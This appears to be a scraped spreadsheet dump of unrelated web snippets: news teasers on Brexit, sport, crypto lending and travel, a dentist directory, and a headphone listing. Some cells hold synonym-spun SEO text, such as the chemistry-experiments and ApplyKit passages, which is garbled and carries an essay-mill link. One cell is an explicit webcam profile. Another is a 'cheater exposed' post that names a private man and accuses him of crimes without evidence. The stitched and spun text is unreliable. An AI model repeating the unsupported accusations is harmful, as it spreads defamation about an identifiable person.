Sep 2019 10:42 PM PDT Portia Smith, 33, is forced to plan her daughter’s birth and her husband’s funeral in the same month after Jonathan Smith, 31, was fatally shot in the head by a childhood friend in New Orleans, Louisiana via https://youtu.be/mFQfuwZZ8h8 Meghan Markle has been wearing £450 ‘evil eye’ necklace to keep foes away Posted: 27 Sep 2019 10:42 PM PDT RICHARD EDEN: Meghan Markle has been wearing a £450 necklace on tour in South Africa this week that’s adorned with an ‘evil eye’.It is created by Turkish-inspired jewellery designer Alemdara, via https://youtu.be/mFQfuwZZ8h8 White House staff ‘restricted access to records of Trump’s calls with Putin and Saudi Crown Prince’ Posted: 27 Sep 2019 10:22 PM PDT The White House is said to have attempted to limit access to President Trump’s conversations with Saudi Crown Prince Mohammed bin Salman and Russian President Vladimir Putin. via https://youtu.be/mFQfuwZZ8h8 You are subscribed to email updates from News Digest. To stop receiving these emails, you may unsubscribe now. Email delivery powered by Google Google, 1600 Amphitheatre Parkway, Mountain View, CA 94043, United States</t>
  </si>
  <si>
    <t>You ought to get a musical note. Since you can see from the video, but the egg isn’t indestructible. Take on the use of detective with some enjoyable filter paper chromatography. Want to Know More About Easy Chemistry Experiments? On top of that, everything you should conduct these mini experiments are available around the home! If you can grab things quickly, you will have hardly any work outside the lesson. So, our very first experiment necessary nothing more than You will also require a room that you’re able to make pretty dark. All you’ll need is string, a straw, and a balloon! 1 bar of ivory soap can be rather exciting! Just take a toy tea kettle and add just a little water and a little bit of dry ice. essaysource com So as to be safe, you always need to work in a shatterproof container with a broad opening. Place the pencil throughout the surface of a jar in order for the string hangs down the center of the jar. Create your own density jar with a spooky Halloween twist to discover the differences. Easy Chemistry Experiments Secrets Maybe you require some suggestions for summer or a rainy moment. This enjoyable activity will permit your toddler to share in the introduction of a food used frequently. Watch for many minutes. We do have to make sure we help our kids find the answers they want to get. You might also enjoy these 18 Easy Science Experiments Perfect for Preschoolers All you will need is some Cornstarch, some water and if you wish to add food colouring for a little fun you are able to. This will amaze the kids! New Step by Step Roadmap for Easy Chemistry Experiments Magnetic Kite-Flying Magnetic fields could possibly be invisible, but they’re nevertheless powerful! A few other differences between these forms of chemical reactions are tabulated below. Watch they change within this experiment! The very first batch is the control batch which needs to be made first. A very cool experiment, but you’ve got to plan ahead. The knockout experiment isn’t an ideal approach to learn everything you can about a formula. It produces a gas called carbon dioxide, which forms plenty of bubbles in addition to the mixture and more compact bubbles at the base of the glass. Miss 5 has been wanting to earn an exploding volcano for some time now. As an example, oil is not as dense than water and will float in addition to its surface. Count how many it requires to produce the water overflow. By mixing just two chemicals together, you’re able to actually produce your own slime! If you set them in water they’ll grow, but they may not taste as excellent. You don’t need to cross-contaminate your samples, and thus don’t use the exact jar in various locations. Head over to Coffee Cups And Crayons to learn all the details you have to finish this exploding experiment. Easy Chemistry Experiments Secrets That No One Else Knows About It’s important to enter the custom of using safety equipment so that it’s automatic. Ive made sure that a large part of these experiments are extremely straightforward and include household items. You can locate the complete collection of what the kit includes at the hyperlink below. There are a lot of common household ways to do this, some safer than others. There are numerous advertising and marketing strategies and the options, which range from free to paid. You’re going to be surprised that you can actually create your own slime by just using materials that may be discovered in our homes. The strong interaction between electrons is apparently a key to realize increased temperature superconductivity. The response isn’t quite as simple as you may think. The new material includes two atomically thin sheets of carbon called graphene. When the heating bit is completed, immediately cover the saucepan to prevent additional evaporation. Bubbles of gas quickly begin to form at every electrode. Dry ice also needs to be handled in well ventilated areas, because it can lower oxygen levels (you’ll observe that all our experiments happened outside). This is known as experimentation, and you may do it, too. Be certain you understand lab security considerations prior to starting. If you wish to try out this experiment, use with safety equipment and we’d suggest that you to have an adult supervision. The more slowly you do so, the better the results. You also need to conduct suitable lab tests to observe how the removal of a particular ingredient affects performance. This simple-to-set-up experiment gives an obvious answer. Sports and exercise have come quite a distance, because of science. The expression knockout experiment was taken from the subject of genetic engineering. They will help you encourage curiosity while beating boredom. Organization is a must in a laboratory. Science activities are such a good way to inspire children to produce predictions and critically think of the world around them. Science and history meet within this witchy spin on an easy and traditional density experiment. Easy Chemistry Experiments Options Whenever your vinegar and baking soda touch, get ready to see the bubbly reaction! Wait a couple of seconds and you ought to be in a position to use the thread to lift the ice cube! The mixture will froth a little, zero worries.</t>
  </si>
  <si>
    <t>Officials executed two warrants at the strawberry farm in Bambun, north of Perth, on Thursday as part of an ongoing operation to crack down on companies exploiting foreign workers.</t>
  </si>
  <si>
    <t>Handpicked Top 3 Dentists in Airdrie. We check reviews, ratings, reputation, history, complaints, satisfaction, trust, cost and their general excellence. Menu Find Business. Bayside Dental &amp; Orthodontics Providing Cosmetic Dentistry Services – When it comes to Airdrie cosmetic dentistry, Bayside Dental &amp; Orthodontics has been known to offer some of the best solutions. Airdries Newest Dental Clinic is Now Open – Get in touch today to book your appointment, walk-ins available Airdrie Dentists Now Accepting New Patients!. Dentist Near Me Free Dental Consultation Dental Fee Guide Form New Patient Form Adult New Patient Form Child Contact Us Blogs. A Family Dentist That Puts Your Care First! At West Airdrie Dental, you can expect excellent service for you and. Our Airdrie dentists are experts and offer personalised dental service plans. We offer a full range of dentist services and cosmetic care by appointment. Our Airdrie dentists are experts and offer personalised dental service plans. Pearl White Dental Laboratory Scotlands Top Dental Lab, 1 Hogg Street, Airdrie Clinic – Opening times, reviews, address, phone number, pictures, postcode, directions and map home about us contact Search go Home &gt; North Lanarkshire &gt; Airdri. Highest Rated Dental Clinic Near Airdrie Top Dental Clinic Near Airdrie Alberta Handpicked Top 3 Dentists in Airdrie. We check reviews, ratings, reputation, history, complaints, satisfaction, trust, cost and their general excellence. Menu Find Business. Friendliest Dental Clinic Near Airdrie Alberta Top Dentist Near Airdrie Alberta Best Dentists in Airdrie, AB – Airdrie Choice Dental, Bayside Dental &amp; Orthodontics, Blunston Dental Group, North Main Family Dental, Sierra Springs Dental, Sonata Dental, Kingsview Dental, Nose Creek Dental Centre, Grace Family Dental, Rahu. Dr. Jim Ellis DDS Dentist – Ogden Is The Cosmetic Dentistry In Ogden – With years of experience, the dentist has been able to create the best possible approach to dental care and treatment, Bayside Dental &amp; Orthodontics has over the years been known to feature some of the top Airdrie dentists. Bringing years of. Cosmetic Dental Clinic In Airdrie Alberta Smile Concepts, Sydney’s Leading Cosmetic Dentist Celebrates 15th Birthday – To celebrate the Sydney based cosmetic dentistry. how far we can take it. Having clinics in every major city would be a dream come true”. Said owner and founder Manesh</t>
  </si>
  <si>
    <t>'I Lost More Than 30 Pounds…And Gained Lots Of New Wrinkles In The Process' Original Source “I see it very frequently,” says dermatologist and Women's Health advisory board … “Like all the other parts of the body, our face has fat, and that fat actually … And since you can't spot-reduce fat (Working Out 101), if you lose weight,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'I Lost More Than 30 Pounds…And Gained Lots Of New Wrinkles In The Process' appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>More than 7,000 police were deployed in Paris, with tear gas used to quell the disruption. The post Yellow vest protests: Dozens of arrests in Paris appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Volatile voters who told opinion polls they wouldn’t support any major political party confounded strong forecasts of a Labor victory in the May 18 election.</t>
  </si>
  <si>
    <t>A court rules Fred McConnell, who gave birth to a child, must be named "mother" on a birth certificate. The post ‘Seahorse’ transgender man loses challenge to be named father appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>R.J. Anderson</t>
  </si>
  <si>
    <t>With the regular season concluding, we’ve decided to take a look at each team’s future — not by using a crystal ball or other psychic abilities, but by evaluating their farm systems. Below you’ll find our ranking of the top five prospects in the organization — sorted by perceived future potential — as well as five other players who fit various categories. Those categories are: 2020 contributor: A player who is likely to play a role for the big-league team next season. Analyst’s pick: A player who is a strong statistical performer and/or whose underlying measures are better than the scouting reports suggest. Riser: A player on the way up. Faller: A player on the way down. One to watch: An interesting player to keep in mind (for whatever reason).</t>
  </si>
  <si>
    <t>Cryptocurrency exchange, Binance, announced phase three of its crypto-lending product yesterday. Now users can earn interest on XRP, Litecoin (LTC), and stable coin, USDC. The coins that were already part of the lending schemes were Binance coin (BNB), Ethereum Classic (ETC), and Tether (USDT). Subscriptions are based on a first-come-first-served model and the phase starts on Sept 11 at 6 am (UTC). The scheme works in the following way. Users deposit their tokens for a fixed term of 14 days and receive a fixed interest rate (paid in tokens) on maturity. Phase two of the product had a 28-day term option, but phase three is limited to 14 days. There is a total subscription cap to the number of token accepted in each phase, and also a limit on how much an individual can lend. The third phase has an annualized interest rate of 7%. However, BNB and Tether have a 10% annualized interest rate. XRP, Litecoin, &amp; USDC joins the mix XRP has an overall subscription cap of 1,000,000, and an individual cap of 50,000 XRP whereas Litecoin has an overall subscription cap of 6,000 LTC, with an individual cap of 300 tokens. The Stablecoin USDC joins the likes of BNB, ETC, and USDT. The mainstream cryptocurrencies like Bitcoin (BTC), Ethereum (ETH), and Cardano (ADA) are not part of this phase. Crypto-Lending: A Controversy Popular news outlet Bitcoinist reported that not everyone is convinced of whether Binance’s crypto-lending product is a good idea. Bitconnect, a scam crypto company had a similar model that didn’t last long. Comparisons to Bitconnect doesn’t help Binance in any way Added to this is the problems that come with depositing tokens on a centralized exchange, that had already been the victim of a hack this year. Now even though Customers were not affected by the hack, handing control of keys to such an exchange is never a safe move as hackers are getting better and better by the day. The first two phases were fully subscribed so regardless of what public media tells you there are still many who believe in Binance’s Crypto-Lending Schemes for better or worse. Follow us on Twitter, Facebook, Steemit, and join our Telegram channel for the latest blockchain and cryptocurrency news Post Views: 47 Posted By Abishek Dharshan Abishek is an Entrepreneur, Digital Nomad, Student, and ICO Marketing Manager currently based in Berlin &amp; Champaign. He is actively involved in the Blockchain space and has worked in numerous projects in the Silicon Valley since 2017. His interests revolve around Finance, Consulting, and Blockchain Research. More from Crypto 56 Apple revealed interest in Bitcoin &amp; Crypto before the iPhone 11 event Posted On September 16, 2019 Abishek Dharshan 0 While other manufacturers were busy integrating crypto wallets in their smartphones, Apple surprised everyone with their credit card. It was … 753 Is EOS Corrupt? Is EOS Hacked? Posted On September 14, 2019 Prasanna 0 The EOS network is based on the delegated Proof of Stake Consensus mechanism. 21 so-called block producers are the delegates … 1.2K Top 3 Best Bitcoin Mixer Services Posted On September 11, 2019 Prasanna 0 Unfortunately, Bitcoin only allows partial anonymity and you can analyze the transactions on the blockchain and assign them if necessary. …</t>
  </si>
  <si>
    <t>(CNN) — Helen Fanthorpe has traveled plenty — attempting to salsa in Cuba and visibly awestruck by the Taj Majal in India — so her bucket list is especially well-thought out. “People always want to know the next hot destination,” said Fanthorpe, who’s based in London. She called out to Rough Guide experts inside and outside the company to recommend “brilliant places for 2020, places that would be big news in 2020, just opened up, up and coming, back on the tourist map and places that are completely unmissable and timeless.” She also wanted a mix of type of destinations, including cities and countries, natural, landscapes and wildlife, ruins, paying homage to famous places worth visiting. This list has inspired her, since she’s only been to 26 places on it. CNN Travel asked her to share her bucket list from the book, so she told us where she wants to go next, in her own words. Tokyo, Japan Gardens like this one at Sensoji Temple provide restful place amid the hustle and bustle of busy Tokyo. Shutterstock “Tokyo — and Japan more generally — might be top of my bucket list, and I’m actually planning a trip there in autumn 2020. Tokyo is at once the home of cutting-edge technologies, glassy skyscrapers, alien robot shows, pulsating nightlife and fresh sushi, serene gardens and Buddhist shrines. There’s always something newer, brasher, weirder in Tokyo. I can’t wait to go and experience the city for myself. I suspect it’s like nowhere else on Earth.” Yellowstone National Park, United States A herd of bison gather in the Hayden Valley at Yellowstone National park. JREden/iStockphoto/Getty Images “Steaming pools of blue edged by green, yellow, orange and brown, thundering waterfalls and spewing geysers — the classic images of volcanic Yellowstone are enough to catapult it on to most bucket lists! I love wildlife and dramatic landscapes, so Yellowstone has got it all. Seeing grizzly bears, buffalo and horned elk in their natural habitat would be incredible.” Genghis Khan Equestrian Statue, Mongolia The world’s largest statue of Genghis Khan is in Mongolia. Shutterstock “I have a couple of friends who’ve traveled the Trans-Siberian Railway. I’ve never done a train journey of that length myself, but I think it’s a really atmospheric way to travel — and it’s also better for the environment. One friend stopped to visit the Genghis Khan Equestrian Statue in Mongolia. This is one of the more bizarre spots in the book — this vast, 44-meter hulk of steel in the middle of the Mongolian steppe. It sparked my imagination because the landmark feels totally incongruous with its surroundings, but is also a testament to how important Genghis Khan still is for the Mongolian people.” Easter Island Easter Island is home to these hulking rock statues carved centuries ago. tankbmb/iStockphoto/Getty Images “Easter Island feels like a totally justified ‘once-in-a-lifetime-experience’ sort of place to me. It’s remote (more than 2,000 kilometers from the nearest inhabited island) with nearly 900 moai statues scattered along the coastline. The thought of these hulks of rock — carved into human form centuries ago, probably to honor ancestors — surrounded by nothing but grass and the ocean sounds like such an awesome sight.” Lahaul and Spiti, India The famous Chandratal Lake captures the unimaginable beauty of Lahaul and Spiti. Shutterstock “Striking, icy and remote, the scenery here is breathtakingly beautiful. Being right next to Tibet, the area’s benefited from Tibetan influence, too. I traveled around India for several months about a decade ago, and totally fell in love with the country. I also think there’s something enticing about an area that has just become more accessible. Why go skiing with the masses in France or Italy when you could go skiing in virgin Lahaul-Spiti?” St. Petersburg, Russia Pertergof Palace is home to this large fountain ensemble. Shutterstock “St. Petersburg is, in my mind, the classic canal city. It’s got 44 islands, beautiful pastel palaces, more than 400 bridges, imposing mansions, churches with colorful onion domes and landscaped gardens and parks. The architecture just sounds unbeatable. I’m also fascinated by the history of the USSR and if you look beyond the palaces, there’s Moskovsky district, with Stalinist neoclassical architecture, and fun finds like the interactive Museum of Soviet Arcade Machines.” Beirut, Lebanon Travelers are coming back to Beirut. ramzihachicho/iStockphoto/Getty Images “Beirut has spent much of its recent history being defined by the troubles in the Middle East — which in turn impacted tourism here. But in a world where overtourism is becoming more of a problem and where adventurous travelers are seeking out the most interesting places to eat, shop and gallery hop, that just makes Beirut even cooler. I haven’t traveled much in the Middle East; it’s a region I’d love to explore more. “ Saxon Switzerland, Germany The sun rises over Bastei rocks and the Bastei Bridge in Saxon Switzerland, Germany. rusm/iStockphoto/Getty Images “The first time I looked at a picture of Saxon Switzerland (actually in Germany), the pinnacles reminded me of somewhere I’d been in China (the Stone Forest near Kunming). I was surprised to learn that these strange rock formations, surrounded by lush countryside and wooded hills, were actually in Europe. Being London based, I love finding great places to visit close to home. It’s just an extra draw that these landscapes featured in Wes Anderson’s Grand Budapest Hotel.” The Alhambra, Spain The Alhambra Palace and fortress complex glows during sunset in Granada. Shutterstock “I’m a massive fan of Islamic art. I think the detail, geometry and colors are just sublime. The Alhambra is meant to be one of the most impressive examples of Moorish architecture and ornamentation the world over, which is why it makes my bucket list.” Namibia Dead remains of an acacia tree provide a stark image at Namib-Naukluft National Park. Matthias Toedt/dpa/AP “There are plenty of safari destinations in Africa, but Namibia looks particularly special. You can see lions, elephants, giraffes and oryx, but there are also the arresting landscapes of the oldest desert in the world. Sand dunes stretch for miles and Deadvlei (a white clay pan cradling a black petrified forest) would be incredible to visit.” When you use affiliate links on this page, CNN may receive revenue. CNN is not responsible for the goods or services provided through such links. 100 best places on Earth for 2020 The post 100 best places on Earth for 2020 appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Starting salaries for teachers could rise by up to £6,000 over the next few years, the government says. Read more? Click here</t>
  </si>
  <si>
    <t>A celebrity chef is suing the Michelin guide because he claims his restaurant lost its three-star status for using Cheddar cheese in a classic French dish. Read more? Click here</t>
  </si>
  <si>
    <t>My Kinks: You suck my nipples Webcam profile: I like to share intimate moments, I want you to come with me to enjoy Favourite sex position: all What I do in my amateur show: cam2cam What I don’t like: rudeness Gallery</t>
  </si>
  <si>
    <t>IT has been 35 months since Attorney-General Natasha Fyles first said a review of the Northern Territory’s much-maligned mandatory sentencing laws was underway.</t>
  </si>
  <si>
    <t>Toby Greene will be the most hated man in Melbourne on Saturday afternoon - and, quite possibly, the most loved as well.</t>
  </si>
  <si>
    <t>seamonkey</t>
  </si>
  <si>
    <t>Poppers are soft cushioned headphones ideal for those who want to listen to their tunes or play games in their own style. Key Features DJ Style Swivel Ear Cups 120 cm Flat Cable - easier to untangle Great quality sound Available in a range of appealing designs Headphones type - Over-Ear Headphones use - Kids Colour - Yellow Manufacturer's warranty - 1 Year</t>
  </si>
  <si>
    <t>Skipper Tim Paine has hit back at Jofra Archer's claims Australia panicked and were complacent in the latter stages of their defeat to England at Headingley.</t>
  </si>
  <si>
    <t>lspuila1953</t>
  </si>
  <si>
    <t>No Work Orders to Report.</t>
  </si>
  <si>
    <t>Karl McDonald</t>
  </si>
  <si>
    <t>With Operation Yellowhammer dominating the news lately, some parliament-watchers might stop to wonder: what exactly is behind the name given to the no-deal Brexit report? Is it a bird? Is it a plane? Well, no, it’s a bird: the yellowhammer is a small yellow songbird native to Europe and Asia, from Ireland and Britain all the way across to Siberia. It could be nothing – just a nice bird name to give to a project being undertaken by the Government. But there is one aspect of the yellowhammer’s mythos that leads those nervous about no-deal Brexit to wonder: its call. According to Enid Blyton, who wrote often about the bird, the yellowhammer’s call can be described as “a little bit of bread and no cheese”. Given the references to possible food supply issues contained in the report itself, that might be considered apt. Whether it’s coincidence or not is down to you to decide. What are yellowhammers like? Farmland, with hedges and tree rows dividing open fields, are a perfect habitat for the bird (Photo: Andreas Trepte/CC BY-SA 2.5) Yellowhammers sometimes migrate seasonally in other climates, but in the UK they’re resident all year around, apart from in some less hospitable parts of the Scottish highlands and islands. They’re most closely related to several dozen species of bunting, and they live in dry, open country with some nearby trees. Farmland, with hedges and tree rows dividing open fields, has proved a perfect habitat for the bird. Previously widespread across Britain, yellowhammers are now on the “red list” of birds who are now a “conservation concern”. Don’t try to read a Brexit metaphor into that, however: it’s also on the decline in other parts of western Europe. Intensification of agriculture – meaning fewer weeds – or fields left in stubble, has caused trouble for the birds, whose decline has been rapid since the 1980s. What’s their diet? Despite Blyton’s bread-and-no-cheese claim for the yellowhammer, it prefers to snack on seeds, including grasses, nettles and docks. When breeding, it also eats invertebrates, from spiders to snails, which it feeds to its chicks. They tend to lay between three and five eggs, and they breed monogamously – sticking with the one partner from the point they begin breeding, at one year old, to death, at three. What do people say about the yellowhammer? Ludwig von Beethoven was inspired by the yellowhammer It’s yellow, it’s loud and it was once very common in Britain, so it’s perhaps no surprised that the yellowhammer has attracted the attention of poets and authors on occasion. In addition to Blyton, who included the bird in her books, there have been literary contributions from Scottish national poet Robbie Burns and English poet John Clare, as well as musical inspiration for Beethoven and Messiaen. It’s even been suggested that Beethoven got the idea for his famous Fifth Symphony from the yellowhammer’s song – although scholars now believe another work, the 4th Piano Concerto, is closer to the mark in terms of melody and rhythm. Wait, what’s Operation Yellowhammer again? It’s the codename for planning around no-deal Brexit. It’s in the news lately because reports leaked revealing possible disruption to food and medicine supplies. Then, a so-called “humble address” followed in the House of Commons, forcing the Government to release the original document. Was it really the original? If so, why doesn’t it say base case? If that question means anything to you – find out more here. If not, happy birdwatching. Brexit NI court dismisses court case over Brexit and peace process Boris Johnson: I absolutely did not lie to the Queen Kwasi Kwarteng says 'many people are saying' judges are biased Why it matters if the title of Operation Yellowhammer was changed Government's no-deal Brexit plans like 'preparing for war' Angela Merkel warns EU about danger of Singapore-style UK The post What is the yellowhammer bird? The possible meaning behind the name for no-deal Brexit preparations report appeared first on inews.co.uk. The post What is the yellowhammer bird? The possible meaning behind the name for no-deal Brexit preparations report appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>The outcome of the Brexit crisis remains uncertain with a range of options from a turbulent no-deal exit to abandoning the entire endeavor.</t>
  </si>
  <si>
    <t>Imre Salusinszky</t>
  </si>
  <si>
    <t>A new book traces the events that led Evan Pederick from Methodist minister’s son to cult member - and Hilton bomber.</t>
  </si>
  <si>
    <t>#pilot #medical #aviation Welcome to the 5th installment of my Vlog series “Life of an AIRLINE PILOT”. In this video I take you along with me to Paris, France for my Annual Medical Class 1 Renewal Exam. Follow me along through the flight, the Massive Paris Charles de Gaulle Airport, Hotel Booking Shenanigans, a fun […] The post PILOT MEDICAL CLASS 1 in Paris – Air France 787 | Pilot Vlog 5 appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Bob Dakha from Port coquitlam bc is a cheating jerk.He told me he was seperated for two years and living alone.well months later i found out not only was he living with a wife but also had four children. He has no morals at all. He abandoned his children and paid no child support. His wife keeps taking him back though so he thinks he can just cheat with no impunity. This lowlife also drinks and drives and deals drugs.I got a call telling me to stay away from him or else his family gonna kill me. well if you are reading this trust me I am staying far far away from this loser! Anyone stupid enough to go near this creep should have their head examined The post Bob Dakha Port coquitlam bc is a cheating jerk appeared first on Cheater Xposed - Cheater Exposed USA.</t>
  </si>
  <si>
    <t>They admit it isn’t actual scientific proof but these radio hosts believe they’ve finally shown the Big Mac has gotten smaller.</t>
  </si>
  <si>
    <t>Japanese Italian Dictionary – travel dictionary to translate Japanese to Italian. Click on the list to show Japanese or Italian synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Japanese Italian Dictionary →</t>
  </si>
  <si>
    <t>The Economist</t>
  </si>
  <si>
    <t>Public schools such as Eton and Rugby are turning to the internet to give alumni a leg-up The post Britain’s old-boy network moves business online to help alumni seek interns and even fellow wine-enthusiasts appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>The NDP has so far failed to nominate a single candidate in New Brunswick with the federal election less than 50 days away.</t>
  </si>
  <si>
    <t>Braden Hamlin-Uele is no stranger to the impact Addin Fonua-Blake can have on a team, having roomed with the Manly star as a Junior Kiwi.</t>
  </si>
  <si>
    <t>Why do some people choose to live next door to their parents? Read more? Click here</t>
  </si>
  <si>
    <t>Police are investigating links between the woman's injuries and a car crash which occurred at a denture clinic in Adelaide earlier this week.</t>
  </si>
  <si>
    <t>Argentina's international bonds fell to record lows on Monday and peso got slapped down again after President Mauricio Macri imposed capital controls on Sunday after announcing the government would "re-profile" its debt by extending maturities.</t>
  </si>
  <si>
    <t>Abigail Turner</t>
  </si>
  <si>
    <t>'A conversation with former first lady Michelle Obama' will be hosted at the Bell MTS Place on Sept. 24 at 12 p.m.</t>
  </si>
  <si>
    <t>The fashion industry is a fossil-fuel-guzzling operation as many of our clothes are made from petroleum-based textiles such as polyester. Even natural fibres such as cotton have a huge carbon footprint and require a large portion of the world’s pesticides. In a bid to solve this disastrous environmental equation, scientists and designers are creating completely new textiles from fast-growing, carbon-sucking organisms such as micro- and macro-algae, mycelium (elements of fungus), bacteria and fermented yeast. These new biotechnologies efficiently convert sunlight and CO2 into mass raw materials, suck carbon out of the atmosphere and pave the way to a carbon-negative wardrobeDr Mark Liu, from the deep green biotech hub at the University of Technology, Sydney, left his career as a fashion designer to focus on developing textiles made from micro-algaeCharlotte McCurdy is a global security fellow at the Rhode Island School of Design and has created a carbon-negative raincoat from macro-algae Continue reading… Read More</t>
  </si>
  <si>
    <t>The "secret" of West Coast goalsneak Liam Ryan has escaped, but it's unlikely to help his opponents during the AFL finals.</t>
  </si>
  <si>
    <t>Guardiola keeps cool after Jesus complaint Pep Guardiola insists he has no problem with Manchester City striker Gabriel Jesus being unhappy about his lack of first-team starts. In a recent interview with a Brazilian TV station, Jesus spoke of his frustration at playing understudy to City’s record goal-scorer Sergio Aguero. Jesus has started just one Premier League game this season, while Aguero has scored in all six league games so far. The Brazilian has three goals in his five appearances, with his other starts coming in the Champions League and League Cup. But despite scoring in the 3-0 League Cup win at Preston on Tuesday, City will likely revert to Aguero for the Premier League match at Everton on Saturday. It is a problem every other manager would like and Guardiola admits he understands Jesus’s point of view about his relative lack of game-time. “No player will be happy when he doesn’t play regularly. Gabriel is happy when he plays and not happy when he doesn’t, but it’s not just him,” Guardiola told reporters on Friday. “Him and Sergio have different qualities. Sergio is one of the most outstanding players I’ve seen in small spaces. “I try to let them both play as much as possible. They each have little details that make the difference. “Sergio could have scored five goals against Watford. Gabriel could have scored three or four against Preston in the Carabao Cup.” Jesus has scored 48 goals in 106 games for City, while Aguero has 239 from his 344 appearances. Yet Guardiola does not believe that as a pair as they do not suit his favoured 4-3-3 formation. “Normally I don’t play with two strikers. We did it in the last few minutes at Norwich and it was not good. Our control was not the best and we were not solid enough,” he said. “It’s so difficult for me. In some games Gabriel gives me something Sergio cannot. And the other way around. “Both guys are incredible. Sergio is one of the nicest guys I’ve ever met. He is so humble for such a top player. “Of course they are upset if they don’t play. They want to play big Champions League games, quarter-finals, semi-finals. “But it’s impossible. How can they be happy? I have to choose 11 and all I can say is that I’m sorry. “The same happens in midfield, with (Ilkay) Gundogan, David Silva, Kevin (De Bruyne), Phil (Foden). We have many games and everyone is necessary.” This post Guardiola keeps cool after Jesus complaint appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>My sister liked New Kids on the Block. Or maybe it was the Backstreet Boys. I can’t tell the difference. So, maybe she didn’t like New Kids on the Block. But just in case she did, here’s this thing. [The YouTube] What’s been on your mind? Got something you’d like to share? A topic to discuss? It’s Thursday Night Open Thread. Who wants to start? 0 0</t>
  </si>
  <si>
    <t>Enjoy :) Rich golden colour with notes of apple wood and floral hops are carried through with a malty palate. A certified organic lager with a refreshing, clean finish.</t>
  </si>
  <si>
    <t>Nature Tour And Travel Africa The post Nature Tour And Travel Africa appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>The AFL has conceded the score review system made the wrong call on Saturday night during the thrilling preliminary final battle between GWS and Collingwood.</t>
  </si>
  <si>
    <t>From tropical cyclones to blazing bushfires, extreme weather events put emergency services under increased pressure in the 2018-19 summer.</t>
  </si>
  <si>
    <t>A new report suggests that it’s highly doubtful Boston Celtics wingman Jaylen Brown will ink a long-term contract extension with the team before the NBA’s October 21 deadline for signing such deals. In a report from Heavy that cited an unnamed league source, veteran NBA reporter Sean Deveney first pointed out that Brown has not been given enough chances to show his potential as a former No. 3 overall draft pick, given how Boston surrounded him with proven veterans such as Kyrie Irving and Gordon Hayward. As such, he noted that the next four weeks may be “somewhat awkward” for Brown and Celtics officials, as the “chance is pretty slim” that Brown will sign a long-term extension with Boston on or before October 21. “Around the league, the expectation is that Brown and the Celtics won’t come to a deal,” Deveney stressed. Click here to continue and read more… The Inquisitr</t>
  </si>
  <si>
    <t>APPLYKIT: A WEB BASED PERSONAL ASSOCIATE FOR HIGHER EDUCATION APPLICATIONS You get during #CampusChat I noticed an exciting new participant @applykit. Naturally the item peaked the interest after the chitchat I did a little research about them. As good luck would have that, the director Bobby Touran emailed everyone with the 411 about their assistance. Heads up dads and moms and trainees there’s another tool accessible to help manage the college setting up process. The very app copes with all facets of the college plan process, as well as recommendations. ApplyKit , the online personalized assistant for the whole college approval process, announced recently the beta release for its ApplyKit service, cloud-based software that will help high school aged people manage their own efforts as well as those of interested stakeholders including recommenders and oldsters. ApplyKit controls the college selection by bringing the entire technique online, and also connecting everyone involved. The main ApplyKit program includes down the page features: Add a ideal school with one simply click, and ApplyKit will routinely load it has the deadlines as well as requirements within checklist type Personalized dia tracks any senior’s progress against most of applications, together with any future deadlines About, secure web based space for college students to work for application products with collaborators like recommenders, consultants, and parents ‘I’ve built an organization around the inefficiencies of college programs, ‘ reported Craig Plummer, a professional university counselor. ‘ApplyKit will help everyone manage the application form process meant for my young people in a way not necessarily previously possible. ‘ Whenever a student generates an ApplyKit account, this lady can look up schools through adding them to him / her dashboard. ApplyKit automatically adds dates and deadlines to the student’s learn timeline for every school this lady chooses. Such dates and also deadlines bring about email alerts to make sure your lover doesn’t neglect a single help the process. ApplyKit then has an online ‘Folder’ for each school to keep components and efficiency clear and arranged. A student can use the ‘Collaborators’ feature towards involve many others in the plan process like appropriate. Like a professor can make up and put up a letter of recommendation on the web. If preferred, ApplyKit might automatically post newsletters to be able to parents to stay them knowledgeable, including analytics on their scholar’s overall improvement. Your pplyKit was founded by just Bobby Touran, a novelón entrepreneur from a family of school teachers, who was shocked by the hassle and guide book grunt work required to control his company school purposes. ‘At ApplyKit, we plan to disrupt the very archaic university application progression, ‘ reported Touran. ‘We have brought out our products, we have clients signing up each day, and we will be announcing many key associations in the arriving months. ‘ Touran crafted ApplyKit within the Wasabi Ventures’ Entrepreneur-in-Residence system, based in each of those Nashua, Brand new Hampshire, along with Baltimore, Maryland. Said Touran, ‘This is a fantastic time for EduTech innovation, thanks to all the excellent resources readily available. For example , along with the Wasabi Businesses EIR system, we are a job candidate for Pearson’s ‘Catalyst’ method. Catalyst exposes startups to be able to Pearson’s API and arranges sessions using Pearson advisors. ‘ Pricing plus Availability ApplyKit works with a Freemium prices model. Virtually any student could sign up and even manage about college app for free; a fundamental plan which covers quite a few applications is $12 each and every month, and a Higher quality plan which unlimited programs is only $25 per month. Reductions are available for students who include 6 or 12 months ahead of time. NERVOUS MOMENTS FOLLOWING YOUR BOSTON RACE EXPLOSIONS Fathers and mothers all across the region watched and even listened for the reason that reports regarding explosions for the Boston Convention began to a water surge the press. Since yesteryear was a vacation to Boston, and for the schools, students generally attend the very Red Sox game or the Boston Marathon. Just about immediately fathers and mothers began to text and call their students who had been attending university or college in Boston ma to check on their safety. The condition: cell service was instantly flooded together with calls and finally shut down for you to hinder any specific possible detonations using cellular phones. When I noticed the news last week, I straight away posted on Facebook or myspace asking the Boston family and friends to check throughout cellphone podiums were all the way down and I wouldn’t communicate with these products. One of this is my Twitter associates, @PreppedPolished (Alexis Avila) seemed to be running the very marathon. I became receiving words updates associated with his advancement but , of course , they prevented. I without delay posted on Forums and The facebook asking one to let us know whenever they heard from your man. Later which evening, the guy responded to very own tweet which he was halted at the 30 mile mark and his relatives and buddies were harmless. https://homeworkstuff.com/algebra-homework-help/ Colleges utilised social media Wheresoever did mom and dad turn to get immediate updates? Facebook and Twitter. Not long after the explosions, colleges went on action using social media. Universities began directing parents to their college web-sites where young people could check and parents can confirm their safety. Each day, these educational facilities updated families regarding the circumstances on campus and the 